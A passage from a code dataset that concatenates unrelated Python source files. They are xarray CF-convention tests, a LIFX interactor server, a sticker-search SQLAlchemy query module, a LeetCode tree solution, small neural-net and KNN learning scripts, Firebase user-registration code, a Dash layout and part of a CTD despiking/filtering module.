self.assertArrayEqual(expected, actual)\n\n def test_infer_datetime_units(self):\n for dates, expected in [(pd.date_range('1900-01-01', periods=5),\n 'days since 1900-01-01 00:00:00'),\n (pd.date_range('1900-01-01 12:00:00', freq='H',\n periods=2),\n 'hours since 1900-01-01 12:00:00'),\n (['1900-01-01', '1900-01-02',\n '1900-01-02 00:00:01'],\n 'seconds since 1900-01-01 00:00:00'),\n (pd.to_datetime(['1900-01-01', '1900-01-02', 'NaT']),\n 'days since 1900-01-01 00:00:00'),\n (pd.to_datetime(['1900-01-01',\n '1900-01-02T00:00:00.005']),\n 'seconds since 1900-01-01 00:00:00'),\n (pd.to_datetime(['NaT', '1900-01-01']),\n 'days since 1900-01-01 00:00:00'),\n (pd.to_datetime(['NaT']),\n 'days since 1970-01-01 00:00:00'),\n ]:\n self.assertEqual(expected, conventions.infer_datetime_units(dates))\n\n def test_cf_timedelta(self):\n examples = [\n ('1D', 'days', np.int64(1)),\n (['1D', '2D', '3D'], 'days', np.array([1, 2, 3], 'int64')),\n ('1h', 'hours', np.int64(1)),\n ('1ms', 'milliseconds', np.int64(1)),\n ('1us', 'microseconds', np.int64(1)),\n (['NaT', '0s', '1s'], None, [np.nan, 0, 1]),\n (['30m', '60m'], 'hours', [0.5, 1.0]),\n ]\n if pd.__version__ >= '0.16':\n # not quite sure why, but these examples don't work on older pandas\n examples.extend([(np.timedelta64('NaT', 'ns'), 'days', np.nan),\n (['NaT', 'NaT'], 'days', [np.nan, np.nan])])\n\n for timedeltas, units, numbers in examples:\n timedeltas = pd.to_timedelta(timedeltas, box=False)\n numbers = np.array(numbers)\n\n expected = numbers\n actual, _ = conventions.encode_cf_timedelta(timedeltas, units)\n self.assertArrayEqual(expected, actual)\n self.assertEqual(expected.dtype, actual.dtype)\n\n if units is not None:\n expected = timedeltas\n actual = conventions.decode_cf_timedelta(numbers, units)\n self.assertArrayEqual(expected, actual)\n self.assertEqual(expected.dtype, actual.dtype)\n\n expected = np.timedelta64('NaT', 'ns')\n actual = conventions.decode_cf_timedelta(np.array(np.nan), 'days')\n self.assertArrayEqual(expected, actual)\n\n def test_cf_timedelta_2d(self):\n timedeltas, units, numbers = ['1D', '2D', '3D'], 'days', np.atleast_2d([1, 2, 3])\n\n timedeltas = np.atleast_2d(pd.to_timedelta(timedeltas, box=False))\n expected = timedeltas\n\n actual = conventions.decode_cf_timedelta(numbers, units)\n self.assertArrayEqual(expected, actual)\n self.assertEqual(expected.dtype, actual.dtype)\n\n def test_infer_timedelta_units(self):\n for deltas, expected in [\n (pd.to_timedelta(['1 day', '2 days']), 'days'),\n (pd.to_timedelta(['1h', '1 day 1 hour']), 'hours'),\n (pd.to_timedelta(['1m', '2m', np.nan]), 'minutes'),\n (pd.to_timedelta(['1m3s', '1m4s']), 'seconds')]:\n self.assertEqual(expected, conventions.infer_timedelta_units(deltas))\n\n def test_invalid_units_raises_eagerly(self):\n ds = Dataset({'time': ('time', [0, 1], {'units': 'foobar since 123'})})\n with self.assertRaisesRegexp(ValueError, 'unable to decode time'):\n decode_cf(ds)\n\n @requires_netCDF4\n def test_dataset_repr_with_netcdf4_datetimes(self):\n # regression test for #347\n attrs = {'units': 'days since 0001-01-01', 'calendar': 'noleap'}\n with warnings.catch_warnings():\n warnings.filterwarnings('ignore', 'unable to decode time')\n ds = decode_cf(Dataset({'time': ('time', [0, 1], attrs)}))\n self.assertIn('(time) object', repr(ds))\n\n attrs = {'units': 'days since 1900-01-01'}\n ds = decode_cf(Dataset({'time': ('time', [0, 1], attrs)}))\n self.assertIn('(time) datetime64[ns]', repr(ds))\n\n\nclass TestNativeEndiannessArray(TestCase):\n def test(self):\n x = np.arange(5, dtype='>i8')\n expected = np.arange(5, dtype='int64')\n a = conventions.NativeEndiannessArray(x)\n assert a.dtype == expected.dtype\n assert a.dtype == expected[:].dtype\n self.assertArrayEqual(a, expected)\n\n\n@requires_netCDF4\nclass TestEncodeCFVariable(TestCase):\n def test_incompatible_attributes(self):\n invalid_vars = [\n Variable(['t'], pd.date_range('2000-01-01', periods=3),\n {'units': 'foobar'}),\n Variable(['t'], pd.to_timedelta(['1 day']), {'units': 'foobar'}),\n Variable(['t'], [0, 1, 2], {'add_offset': 0}, {'add_offset': 2}),\n Variable(['t'], [0, 1, 2], {'_FillValue': 0}, {'_FillValue': 2}),\n ]\n for var in invalid_vars:\n with self.assertRaises(ValueError):\n conventions.encode_cf_variable(var)\n\n def test_missing_fillvalue(self):\n v = Variable(['x'], np.array([np.nan, 1, 2, 3]))\n v.encoding = {'dtype': 'int16'}\n with self.assertWarns('floating point data as an integer'):\n conventions.encode_cf_variable(v)\n\n\n@requires_netCDF4\nclass TestDecodeCF(TestCase):\n def test_dataset(self):\n original = Dataset({\n 't': ('t', [0, 1, 2], {'units': 'days since 2000-01-01'}),\n 'foo': ('t', [0, 0, 0], {'coordinates': 'y', 'units': 'bar'}),\n 'y': ('t', [5, 10, -999], {'_FillValue': -999})\n })\n expected = Dataset({'foo': ('t', [0, 0, 0], {'units': 'bar'})},\n {'t': pd.date_range('2000-01-01', periods=3),\n 'y': ('t', [5.0, 10.0, np.nan])})\n actual = conventions.decode_cf(original)\n self.assertDatasetIdentical(expected, actual)\n\n def test_invalid_coordinates(self):\n # regression test for GH308\n original = Dataset({'foo': ('t', [1, 2], {'coordinates': 'invalid'})})\n actual = conventions.decode_cf(original)\n self.assertDatasetIdentical(original, actual)\n\n def test_decode_coordinates(self):\n # regression test for GH610\n original = Dataset({'foo': ('t', [1, 2], {'coordinates': 'x'}),\n 'x': ('t', [4, 5])})\n actual = conventions.decode_cf(original)\n self.assertEqual(actual.foo.encoding['coordinates'], 'x')\n\n def test_0d_int32_encoding(self):\n original = Variable((), np.int32(0), encoding={'dtype': 'int64'})\n expected = Variable((), np.int64(0))\n actual = conventions.maybe_encode_dtype(original)\n self.assertDatasetIdentical(expected, actual)\n\n def test_decode_cf_with_multiple_missing_values(self):\n original = Variable(['t'], [0, 1, 2],\n {'missing_value': np.array([0, 1])})\n expected = Variable(['t'], [np.nan, np.nan, 2], {})\n with warnings.catch_warnings(record=True) as w:\n actual = conventions.decode_cf_variable(original)\n self.assertDatasetIdentical(expected, actual)\n self.assertIn('variable has multiple fill', str(w[0].message))\n\n def test_decode_cf_with_drop_variables(self):\n original = Dataset({\n 't': ('t', [0, 1, 2], {'units': 'days since 2000-01-01'}),\n 'x': (\"x\", [9, 8, 7], {'units': 'km'}),\n 'foo': (('t', 'x'), [[0, 0, 0], [1, 1, 1], [2, 2, 2]], {'units': 'bar'}),\n 'y': ('t', [5, 10, -999], {'_FillValue': -999})\n })\n expected = Dataset({\n 't': pd.date_range('2000-01-01', periods=3),\n 'x': (\"x\", [0, 1, 2]),\n 'foo': (('t', 'x'), [[0, 0, 0], [1, 1, 1], [2, 2, 2]], {'units': 'bar'}),\n 'y': ('t', [5, 10, np.nan])\n })\n actual = conventions.decode_cf(original, drop_variables=(\"x\",))\n actual2 = conventions.decode_cf(original, drop_variables=\"x\")\n self.assertDatasetIdentical(expected, actual)\n self.assertDatasetIdentical(expected, actual2)\n\n\nclass CFEncodedInMemoryStore(WritableCFDataStore, InMemoryDataStore):\n pass\n\n\nclass NullWrapper(utils.NDArrayMixin):\n \"\"\"\n Just for testing, this lets us create a numpy array directly\n but make it look like its not in memory yet.\n \"\"\"\n def __init__(self, array):\n self.array = array\n\n def __getitem__(self, key):\n return self.array[indexing.orthogonal_indexer(key, self.shape)]\n\n\ndef null_wrap(ds):\n \"\"\"\n Given a data store this wraps each variable in a NullWrapper so that\n it appears to be out of memory.\n \"\"\"\n variables = dict((k, Variable(v.dims, NullWrapper(v.values), v.attrs))\n for k, v in iteritems(ds))\n return InMemoryDataStore(variables=variables, attributes=ds.attrs)\n\n\n@requires_netCDF4\nclass TestCFEncodedDataStore(CFEncodedDataTest, TestCase):\n @contextlib.contextmanager\n def create_store(self):\n yield CFEncodedInMemoryStore()\n\n @contextlib.contextmanager\n def roundtrip(self, data, save_kwargs={}, open_kwargs={}):\n store = CFEncodedInMemoryStore()\n data.dump_to_store(store, **save_kwargs)\n yield open_dataset(store, **open_kwargs)\n\n def test_roundtrip_coordinates(self):\n raise unittest.SkipTest('cannot roundtrip coordinates yet for '\n 'CFEncodedInMemoryStore')\n\n def test_invalid_dataarray_names_raise(self):\n pass\n\n def test_encoding_kwarg(self):\n pass\n","sub_path":"xarray/test/test_conventions.py","file_name":"test_conventions.py","file_ext":"py","file_size_in_byte":28068,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"80"} +{"seq_id":"93880243","text":"from interactor.request_handlers import CommandHandler, WSHandler\nfrom interactor.commander.animations import Animations\n\nfrom photons_app import helpers as hp\n\nfrom photons_control.device_finder import DeviceFinderDaemon, Finder\n\nfrom whirlwind.commander import Commander\nfrom whirlwind.server import Server\nimport logging\nimport time\n\nlog = logging.getLogger(\"interactor.server\")\n\n\nclass Server(Server):\n def __init__(self, final_future, *, server_end_future, store=None):\n super().__init__(final_future, server_end_future=server_end_future)\n\n if store is None:\n from interactor.commander.store import store, load_commands\n\n load_commands()\n\n self.store = store\n self.wsconnections = {}\n\n async def wait_for_end(self):\n await hp.wait_for_all_futures(self.server_end_future, name=\"Server::wait_for_end\")\n\n def tornado_routes(self):\n return [\n (\"/v1/lifx/command\", CommandHandler, {\"commander\": self.commander}),\n (\n \"/v1/ws\",\n WSHandler,\n {\n \"commander\": self.commander,\n \"server_time\": time.time(),\n \"final_future\": self.server_end_future,\n \"wsconnections\": self.wsconnections,\n },\n ),\n ]\n\n async def setup(self, server_options, *, tasks, sender, cleaners, animation_options=None):\n self.sender = sender\n self.cleaners = cleaners\n self.server_options = server_options\n self.animation_options = animation_options\n\n self.tasks = tasks\n self.tasks._merged_options_formattable = True\n\n self.db_queue = __import__(\"interactor.database.db_queue\").database.db_queue.DBQueue(\n self.final_future, 5, lambda exc: 1, self.server_options.database.uri\n )\n self.cleaners.append(self.db_queue.finish)\n self.db_queue.start()\n\n self.finder = Finder(sender, final_future=self.final_future)\n self.finder._merged_options_formattable = True\n self.cleaners.append(self.finder.finish)\n\n self.daemon = DeviceFinderDaemon(sender, finder=self.finder)\n self.cleaners.append(self.daemon.finish)\n await self.daemon.start()\n\n self.animations = Animations(\n self.final_future, self.tasks, self.sender, self.animation_options\n )\n self.animations._merged_options_formattable = True\n\n self.commander = Commander(\n self.store,\n tasks=self.tasks,\n sender=self.sender,\n finder=self.finder,\n db_queue=self.db_queue,\n animations=self.animations,\n final_future=self.final_future,\n server_options=self.server_options,\n )\n\n async def cleanup(self):\n self.tasks.add(self.animations.stop())\n await hp.wait_for_all_futures(\n *self.wsconnections.values(), name=\"Server::cleanup[wait_for_wsconnections]\"\n )\n","sub_path":"apps/interactor/interactor/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":3006,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"80"} +{"seq_id":"550006455","text":"\"\"\"Query composition for inline search.\"\"\"\nfrom sqlalchemy import func, case, cast, Numeric, or_\n\nfrom stickerfinder.models import (\n Sticker,\n StickerSet,\n sticker_tag,\n Tag,\n)\n\n\ndef get_strict_matching_stickers(session, tags, nsfw, furry, offset, is_default_language):\n \"\"\"Query all strictly matching stickers for given tags.\"\"\"\n matching_stickers = get_strict_matching_query(session, tags, nsfw, furry, is_default_language)\n\n matching_stickers = matching_stickers.offset(offset) \\\n .limit(50) \\\n .all()\n\n return matching_stickers\n\n\ndef get_fuzzy_matching_stickers(session, tags, nsfw, furry, offset, is_default_language):\n \"\"\"Get fuzzy matching stickers.\"\"\"\n matching_stickers = get_fuzzy_matching_query(session, tags, nsfw, furry, offset, is_default_language) \\\n .offset(offset) \\\n .limit(50) \\\n .all()\n\n return matching_stickers\n\n\ndef get_strict_matching_sticker_sets(session, tags, nsfw, furry, offset, is_default_language):\n \"\"\"Get all sticker sets by accumulated score for strict search.\"\"\"\n strict_subquery = get_strict_matching_query(session, tags, nsfw, furry, is_default_language, sticker_set=True) \\\n .subquery('strict_sticker_subq')\n\n score = func.sum(strict_subquery.c.score).label('score')\n matching_sets = session.query(StickerSet, score) \\\n .join(strict_subquery, StickerSet.name == strict_subquery.c.name) \\\n .group_by(StickerSet) \\\n .order_by(score.desc()) \\\n .limit(8) \\\n .offset(offset) \\\n .all()\n\n return matching_sets\n\n\ndef get_strict_matching_query(session, tags, nsfw, furry, is_default_language, sticker_set=False):\n \"\"\"Get the query for strict tag matching.\"\"\"\n tag_count = func.count(sticker_tag.c.tag_name).label(\"tag_count\")\n tag_subq = session.query(sticker_tag.c.sticker_file_id, tag_count) \\\n .join(Tag) \\\n .filter(or_(Tag.is_default_language == is_default_language, Tag.is_default_language == True)) \\\n .filter(sticker_tag.c.tag_name.in_(tags)) \\\n .group_by(sticker_tag.c.sticker_file_id) \\\n .subquery(\"tag_subq\")\n\n # Condition for matching sticker set names and titles\n set_conditions = []\n for tag in tags:\n set_conditions.append(case([\n (StickerSet.name.like(f'%{tag}%'), 0.75),\n (StickerSet.title.like(f'%{tag}%'), 0.75),\n ], else_=0))\n\n # Condition for matching sticker text\n text_conditions = []\n for tag in tags:\n text_conditions.append(case([(Sticker.text.like(f'%{tag}%'), 0.40)], else_=0))\n\n # Compute the whole score\n score = cast(func.coalesce(tag_subq.c.tag_count, 0), Numeric)\n for condition in set_conditions + text_conditions:\n score = score + condition\n score = score.label('score')\n\n # Query the whole sticker set in case we actually want to query sticker sets\n intermediate_query = session.query(Sticker.file_id, StickerSet.name, score)\n\n # Compute the score for all stickers and filter nsfw stuff\n # We do the score computation in a subquery, since it would otherwise be recomputed for statement.\n intermediate_query = intermediate_query \\\n .outerjoin(tag_subq, Sticker.file_id == tag_subq.c.sticker_file_id) \\\n .join(Sticker.sticker_set) \\\n .filter(StickerSet.banned.is_(False)) \\\n .filter(StickerSet.reviewed.is_(True)) \\\n .filter(StickerSet.nsfw.is_(nsfw)) \\\n .filter(StickerSet.furry.is_(furry)) \\\n .filter(or_(StickerSet.is_default_language == is_default_language, StickerSet.is_default_language == True)) \\\n .subquery('strict_intermediate')\n\n if sticker_set:\n matching_stickers = session.query(\n intermediate_query.c.file_id,\n intermediate_query.c.name,\n intermediate_query.c.score\n )\n else:\n matching_stickers = session.query(intermediate_query.c.file_id, intermediate_query.c.score)\n # Now filter and sort by the score. Ignore the score threshold when searching for nsfw\n matching_stickers = matching_stickers \\\n .filter(or_(intermediate_query.c.score > 0, nsfw, furry)) \\\n .order_by(intermediate_query.c.score.desc(), intermediate_query.c.name, intermediate_query.c.file_id)\n\n return matching_stickers\n\n\ndef get_fuzzy_matching_query(session, tags, nsfw, furry, offset, is_default_language):\n \"\"\"Query all fuzzy matching stickers.\"\"\"\n threshold = 0.3\n # Create a query for each tag, which fuzzy matches all tags and computes the distance\n matching_tags = []\n for tag in tags:\n tag_query = session.query(Tag.name.label('tag_name'), func.similarity(Tag.name, tag).label('tag_similarity')) \\\n .filter(func.similarity(Tag.name, tag) >= threshold) \\\n .filter(or_(Tag.is_default_language == is_default_language, Tag.is_default_language == True))\n matching_tags.append(tag_query)\n\n # Union all fuzzy matched tags\n if len(matching_tags) > 1:\n matching_tags = matching_tags[0].union(*matching_tags[1:])\n else:\n matching_tags = matching_tags[0]\n matching_tags = matching_tags.subquery('matching_tags')\n\n # Group all matching tags to get the max score of the best matching searched tag.\n fuzzy_subquery = session.query(matching_tags.c.tag_name, func.max(matching_tags.c.tag_similarity).label('tag_similarity')) \\\n .group_by(matching_tags.c.tag_name) \\\n .subquery()\n\n # Get all stickers which match a tag, together with the accumulated score of the fuzzy matched tags.\n fuzzy_score = func.sum(fuzzy_subquery.c.tag_similarity).label(\"fuzzy_score\")\n tag_subq = session.query(sticker_tag.c.sticker_file_id, fuzzy_score) \\\n .join(fuzzy_subquery, sticker_tag.c.tag_name == fuzzy_subquery.c.tag_name) \\\n .group_by(sticker_tag.c.sticker_file_id) \\\n .subquery(\"tag_subq\")\n\n # Condition for matching sticker set names and titles\n set_conditions = []\n for tag in tags:\n set_conditions.append(case([\n (func.similarity(StickerSet.name, tag) >= threshold, func.similarity(StickerSet.name, tag)),\n (func.similarity(StickerSet.title, tag) >= threshold, func.similarity(StickerSet.title, tag)),\n ], else_=0))\n\n # Condition for matching sticker text\n text_conditions = []\n for tag in tags:\n text_conditions.append(case([(func.similarity(Sticker.text, tag) >= threshold, 0.30)], else_=0))\n\n # Compute the whole score\n score = cast(func.coalesce(tag_subq.c.fuzzy_score, 0), Numeric)\n for condition in set_conditions + text_conditions:\n score = score + condition\n score = score.label('score')\n\n # Query all strict matching results to exclude them.\n strict_subquery = get_strict_matching_query(session, tags, nsfw, furry, is_default_language) \\\n .subquery('strict_subquery')\n\n # Compute the score for all stickers and filter nsfw stuff\n # We do the score computation in a subquery, since it would otherwise be recomputed for statement.\n intermediate_query = session.query(Sticker.file_id, StickerSet.title, score) \\\n .outerjoin(tag_subq, Sticker.file_id == tag_subq.c.sticker_file_id) \\\n .outerjoin(strict_subquery, Sticker.file_id == strict_subquery.c.file_id) \\\n .join(Sticker.sticker_set) \\\n .filter(strict_subquery.c.file_id.is_(None)) \\\n .filter(StickerSet.banned.is_(False)) \\\n .filter(StickerSet.reviewed.is_(True)) \\\n .filter(StickerSet.nsfw.is_(nsfw)) \\\n .filter(StickerSet.furry.is_(furry)) \\\n .filter(or_(StickerSet.is_default_language == is_default_language, StickerSet.is_default_language == True)) \\\n .subquery('fuzzy_intermediate')\n\n # Now filter and sort by the score. Ignore the score threshold when searching for nsfw\n matching_stickers = session.query(intermediate_query.c.file_id, intermediate_query.c.score) \\\n .filter(or_(intermediate_query.c.score > 0, nsfw, furry)) \\\n .order_by(intermediate_query.c.score.desc(), intermediate_query.c.title, intermediate_query.c.file_id) \\\n\n return matching_stickers\n","sub_path":"stickerfinder/helper/inline_query.py","file_name":"inline_query.py","file_ext":"py","file_size_in_byte":8087,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"80"} +{"seq_id":"581749886","text":"#\n# @lc app=leetcode id=2583 lang=python3\n#\n# [2583] Kth Largest Sum in a Binary Tree\n#\n\n# @lc code=start\n# Definition for a binary tree node.\n# class TreeNode:\n# def __init__(self, val=0, left=None, right=None):\n# self.val = val\n# self.left = left\n# self.right = right\nclass Solution:\n def kthLargestLevelSum(self, root: Optional[TreeNode], k: int) -> int:\n\n vals = []\n stack = [(root, 0)]\n while stack:\n node, i = stack.pop()\n if i == len(vals):\n vals.append(0)\n vals[i] += node.val\n\n if node.left:\n stack.append((node.left, i + 1))\n\n if node.right:\n stack.append((node.right, i + 1))\n\n return sorted(vals, reverse=True)[k - 1] if len(vals) >= k else -1\n \n# @lc code=end\n\n","sub_path":"2583.kth-largest-sum-in-a-binary-tree.py","file_name":"2583.kth-largest-sum-in-a-binary-tree.py","file_ext":"py","file_size_in_byte":840,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"80"} +{"seq_id":"424855030","text":"# -*- coding: utf-8 -*-\n# Back-Propagation Neural Networks by Tangent\n\n##-Starting---------------------------------------------------------------------\nimport platform\nif \"windows\" in platform.platform().lower():path = 'D:/pydata-book/ch05/'\nelse:path = '/Users/Tangent/Desktop/my-learning/'\nimport numpy as np\nimport pandas as pd\n##-Done-------------------------------------------------------------------------\n\ndata=pd.read_csv(path+'votedata.csv')\nm=len(data)\nsequence=np.random.permutation(m)\ntrain_set=data.ix[sequence[:1000]]\ntrain_set.index=range(1000)\ntest_set=data.ix[sequence[1000:]]\ntest_set.index=range(m-1000)\n\ndef sigmoid(x):\n # Symmetrical sigmoid\n return 1/(1+np.exp(-x))\nvsigmoid = np.vectorize(sigmoid)\n\ndef dsigmoid(y):\n return y - y**2\nvdsigmoid = np.vectorize(dsigmoid)\n\nclass NN:\n def __init__(self, i_num, h_num, no):\n self.ni = i_num+1\n self.nh = h_num+1\n self.no = no\n # Initialize numpy arrays of ones with default dtype float\n self.ai = np.ones((self.ni,1), dtype=float)\n self.ah = np.ones((self.nh,1), dtype=float)\n self.ao = np.ones((self.no,1), dtype=float)\n # initialize weights random in range [-0.2, 0.2)\n self.wi = (np.random.random_sample((self.ni, self.nh-1)) - 0.5) * 0.4\n # Make random matrix with values in range [-2., 2.)\n self.wh = (np.random.random_sample((self.nh, self.no)) - 0.5) * 0.4\n # last change in weights for momentum ??\n \n def update(self, inputs):\n if len(inputs) != self.ni - 1:\n raise ValueError(\"Wrong number of inputs\")\n\n # input activations\n self.ai[1:,0] = inputs\n\n # hidden activations\n # shapes: (nh,1) = (nh,sni) x (sni,1)\n self.ah[1:] = vsigmoid( self.wi.T.dot(self.ai) )\n\n # output activations\n # shapes: (no,1) = (no,nh) x (nh,1)\n self.ao = vsigmoid( self.wh.T.dot(self.ah) )\n\n return self.ao\n \n def backPropagate(self, targets, N):\n if len(targets) != self.no:\n raise ValueError('Wrong number of target values')\n # Assume 'targets' has shape (no,1)\n error = targets - self.ao\n # vectorized sigmoid followed by element-wise multiplication with errors\n # (no,1) * constant:\n output_deltas = error\n # (nh,1) = (nh,no) matrix times (no,1) column vector:\n error = self.wh.dot(output_deltas)\n # (nh,1) * constant:\n hidden_deltas = vdsigmoid(self.ah[1:]) * error[1:]\n # (nh,no) matrix = (nh,1) column vector times (1,no) row vector:\n change = self.ah.dot(output_deltas.T)\n self.wh += N*change\n # (self.ni,nh) = (self.ni,1) x (1,nh):\n change = self.ai.dot(hidden_deltas.T)\n # Each of these objects (except N,M) has shape (self.ni,nh):\n self.wi += N*change\n # Vector subtraction, element-wise exponentiation, then sum over \n #[self.no] elements \n error = np.sum(-targets*np.log(self.ao)-[1-targets]*np.log(1-self.ao))\n return error \n \n def train(self, patterns, iterations=5, N=0.1):\n # N: learning rate\n errs = []\n for i in range(iterations):\n error = 0.0\n # Do backpropagation training one data point at time:\n for p in range(len(patterns)):\n inputs = np.array(patterns.ix[p][1:9])\n targets = patterns.ix[p][11:15]\n self.update(inputs)\n error = error + self.backPropagate(np.array(targets).reshape((\n len(targets),1)), N) \n errs.append(error)\n print('error %0.5f' % error)\n return errs # Uncomment this to get training error as function\n \n def test(self, patterns):\n s=0.\n for p in range(len(patterns)):\n a=patterns.ix[p][10]\n b=np.sum(np.round(self.update(np.array(patterns.ix[p][1:9]))))\n c=np.round(self.update(np.array(patterns.ix[p][1:9])))\n s=s+(a-b<0.01)\n #print(a, '->', b)\n print(s/len(patterns))\n \n def weights(self):\n print('Input weights:')\n for i in range(self.ni):\n print(self.wi[i])\n print()\n print('Output weights:')\n for j in range(self.nh):\n print(self.wh[j])\n \n\n \nexc=NN(8,9,4)\nexc.train(train_set,5,0.1)\n#exc.test(test_set)\nexc.weights()","sub_path":"NN_tan.py","file_name":"NN_tan.py","file_ext":"py","file_size_in_byte":4397,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"80"} +{"seq_id":"637221667","text":"#!/usr/bin/env python\n# -*- coding=utf-8 -*-\n\nfrom sklearn.datasets import load_iris, load_digits, fetch_20newsgroups, load_boston\nfrom sklearn.preprocessing import StandardScaler\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.neighbors import KNeighborsClassifier\n\n\ndef knniris():\n \"\"\"\n k近邻分析\n k值取多大,有什么影响:\n 1. k值取很小:容易受到异常因素的影响\n 2. k值取很大:近邻的样本太多,准确率受到影响\n 性能问题:\n 时间复杂度,消耗资源\n :return:\n \"\"\"\n # 1. 准备数据集,数据的分割\n li = load_iris()\n x_train, x_test, y_train, y_test = train_test_split(li.data, li.target, test_size=0.25)\n\n # 2. 数据的标准化处理\n std = StandardScaler()\n\n x_train = std.fit_transform(x_train)\n\n x_test = std.fit_transform(x_test)\n\n # 3. estimator流程\n knn = KNeighborsClassifier()\n\n knn.fit(x_train, y_train)\n\n # 测试集预测的目标值\n y_predict = knn.predict(x_test)\n\n print(y_predict, y_test)\n\n # 计算准确率\n score = knn.score(x_test, y_test)\n\n print(\"预测的准确率为:\", score)\n\n return None\n\nif __name__ == '__main__':\n knniris()\n","sub_path":"3_k近邻分析.py","file_name":"3_k近邻分析.py","file_ext":"py","file_size_in_byte":1249,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"80"} +{"seq_id":"96138404","text":"from firebase_admin import db, auth\nfrom ficheros.codigo import Generador\nclass RegistrarModel:\n def registrar_usuario_cliente(self,datos,ruta):\n try:\n user = auth.create_user(email=datos['correo_usuario_registrar'],\n phone_number=\"+57\"+datos['telefono_usuario_registrar'],\n display_name=datos['nombre_usuario_registrar'],\n password=datos['password_usuario_registrar'])\n \n datos_guardar = {\n 'uid_user_registra':datos['uid_usuario'],\n 'uid_user':user.uid,\n 'nombre_gerente':datos['nombre_usuario_registrar'],\n 'apellido_gerente':datos['apellido_usuario_registrar'],\n 'telefono_usuario':datos['telefono_usuario_registrar'],\n 'correo_usuario':datos['correo_usuario_registrar'],\n }\n ref = db.reference()\n ref.child('geo'+ruta).child(user.uid).set(datos_guardar)\n\n return True,''\n except Exception as e:\n print(e)\n generator = Generador()\n codigo = generator.validarGuardarInformacionError('000','crear usuario','POST','admin')\n return False,codigo\n\n def registrar_tienda(self,datos):\n try:\n datos_guardar = {\n 'uid_user_registra':datos['uid_usuario'],\n 'nombre_sede_tienda':datos['nombre_tienda_registrar'],\n 'latitud_tienda':datos['latitud_tienda'],\n 'longitud_tienda':datos['longitud_tienda'],\n 'zona_influencia':datos['zona_influencia'],\n 'estado_disponibilidad':False,\n 'admin-tienda_asignado':''\n }\n ref = db.reference()\n ref.child('geoTIENDAS').push(datos_guardar)\n return True,''\n except Exception as e:\n print(e)\n generator = Generador()\n codigo = generator.validarGuardarInformacionError('000','crear usuario','POST','admin')\n return False,codigo \n\n def registrar_cliente(self,datos):\n try:\n user = auth.create_user(email=datos['correo_cliente'],\n phone_number=\"+57\"+datos['telefono_cliente'],\n display_name=datos['nombre_cliente'],\n password=datos['password_cliente'])\n \n datos_guardar = {\n 'nombre_cliente':datos['nombre_cliente'],\n 'cedula_cliente':datos['cedula_cliente'],\n 'apellido_cliente':datos['apellido_cliente'],\n 'telefono_cliente':datos['telefono_cliente'],\n 'correo_cliente':datos['correo_cliente'],\n }\n ref = db.reference()\n ref.child('geoCLIENTES').child(user.uid).set(datos_guardar)\n\n return True,''\n except Exception as e:\n print(e)\n generator = Generador()\n codigo = generator.validarGuardarInformacionError('','crear cliente','','')\n return False,codigo ","sub_path":"mype/model/registrar_model.py","file_name":"registrar_model.py","file_ext":"py","file_size_in_byte":3118,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"} +{"seq_id":"47388678","text":"import dash_html_components as html\n\nlayout = html.Div(\n children=[\n html.H1(children=\"Dashboard 1\"),\n html.Div(\n children=\"\"\"\n This dashboard is first\n \"\"\"\n ),\n ]\n)\n\ndef create_app(factory):\n app = factory(__name__)\n app.layout = layout\n return app","sub_path":"examples/simple_example/dashboard_1.py","file_name":"dashboard_1.py","file_ext":"py","file_size_in_byte":314,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"} +{"seq_id":"188911851","text":"from __future__ import absolute_import, division, print_function\n\nimport numpy as np\nimport numpy.ma as ma\n\nfrom pandas import Index, Series\n\nfrom .utilities import Path, rolling_window\n\ndata_path = Path(__file__).parents[1].joinpath('tests', 'data')\n\n\ndef despike(self, n1=2, n2=20, block=100, keep=0):\n \"\"\"\n Wild Edit Seabird-like function. Passes with Standard deviation\n `n1` and `n2` with window size `block`.\n\n \"\"\"\n\n data = self.values.astype(float).copy()\n roll = rolling_window(data, block)\n roll = ma.masked_invalid(roll)\n std = n1 * roll.std(axis=1)\n mean = roll.mean(axis=1)\n # Use the last value to fill-up.\n std = np.r_[std, np.tile(std[-1], block - 1)]\n mean = np.r_[mean, np.tile(mean[-1], block - 1)]\n mask = (np.abs(data - mean.filled(fill_value=np.NaN)) >\n std.filled(fill_value=np.NaN))\n data[mask] = np.NaN\n\n # Pass two recompute the mean and std without the flagged values from pass\n # one and removed the flagged data.\n roll = rolling_window(data, block)\n roll = ma.masked_invalid(roll)\n std = n2 * roll.std(axis=1)\n mean = roll.mean(axis=1)\n # Use the last value to fill-up.\n std = np.r_[std, np.tile(std[-1], block - 1)]\n mean = np.r_[mean, np.tile(mean[-1], block - 1)]\n values = self.values.astype(float)\n mask = (np.abs(values - mean.filled(fill_value=np.NaN)) >\n std.filled(fill_value=np.NaN))\n\n clean = self.astype(float).copy()\n clean[mask] = np.NaN\n return clean\n\n\ndef lp_filter(data, sample_rate=24.0, time_constant=0.15):\n \"\"\"\n Filter a series with `time_constant` (use 0.15 s for pressure), and for\n a signal of `sample_rate` in Hertz (24 Hz for 911+).\n NOTE: 911+ systems do not require filter for temperature nor salinity.\n\n Examples\n --------\n >>> import matplotlib.pyplot as plt\n >>> from ctd import DataFrame, lp_filter\n >>> raw = DataFrame.from_cnv(data_path.joinpath('CTD-spiked-unfiltered.cnv.bz2'))\n >>> prc = DataFrame.from_cnv(data_path.joinpath('CTD-spiked-filtered.cnv.bz2'))\n >>> kw = dict(sample_rate=24.0, time_constant=0.15)\n >>> original = prc.index.values\n >>> unfiltered = raw.index.values\n >>> filtered = lp_filter(unfiltered, **kw)\n >>> fig, ax = plt.subplots()\n >>> l1, = ax.plot(original, 'k', label='original')\n >>> l2, = ax.plot(unfiltered, 'r', label='unfiltered')\n >>> l3, = ax.plot(filtered, 'g', label='filtered')\n >>> leg = ax.legend()\n >>> _ = ax.axis([33564, 33648, 1034, 1035])\n\n Notes\n -----\n http://wiki.scipy.org/Cookbook/FIRFilter\n\n\n \"\"\"\n\n from scipy import signal\n\n if 